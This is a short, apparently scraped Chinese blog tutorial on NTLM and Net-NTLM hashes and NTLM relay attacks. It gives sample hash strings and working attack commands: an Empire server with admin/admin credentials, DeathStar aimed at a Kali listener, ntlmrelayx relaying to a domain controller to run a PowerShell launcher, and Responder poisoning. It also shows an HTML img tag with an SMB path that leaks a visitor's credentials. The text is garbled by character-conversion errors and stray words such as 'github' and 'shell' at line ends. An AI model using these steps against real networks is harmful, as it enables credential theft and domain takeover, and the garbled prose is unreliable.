一、NTLM(V1/V2)的hash是存放在安全帳戶管理(SAM)數據庫以及域控的NTDS.dit數據庫中,獲取該Hash值能夠直接進行PtH攻擊,我博客中前文也有介紹過。
二、Net-NTLM(V1/V2)的hash值是基於用戶的NT的hash值通過必定的算法產生的。html
#NTLM-Hash aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42 前面是LMhash後面是NT的Hash #Net-NTLM-Hash admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030
說到底,在使用一些服務的過程當中,須要帶有windows的自身的認證信息,其實就是Net-NTLM的Hash,而這些東西你可使用像Responder或者Inveigh這些工具得到。而後你獲取了這個Net-NTLM的Hash,就能夠轉給真正的驗證服務器去驗證,從而做爲攻擊者的你就能夠經過真實的服務器的身份驗證,這種攻擊方式就稱做NTLM中繼攻擊。python
控制受害者訪問一個站點(不存在的最好),你做爲攻擊者對此做出應答,認證信息會傳到你的攻擊者的機器上,你對此再作轉發,去真實的服務器上認證,便可獲取真正服務器的權限。git
sudo python empire --rest --username admin --password admin
github
launcher powershell DeathStar
root@kali:~/DeathStar# ./DeathStar.py --listener-ip kali_ip -t 100 -u admin -p admin
ntlmrelayx.py -t target_ip(例如域控) -c 'powershell腳本生成的內容'
先修改文件(Responder.py):
而後算法
python Responder.py -I eth0 -r -d –v
能夠看出中繼是認證成功的,可是rpc調用失敗了,由於權限不夠。shell
在瀏覽器沙箱不斷髮展的幾天,不少僞協議或者文件協議的訪問方式都已經被禁止了,可是SMB依然能夠數據庫
<img src='\\WIN-8JQH4CQEJIR\User\img\1.jpg'>
這樣就能夠實現控制的訪問。windows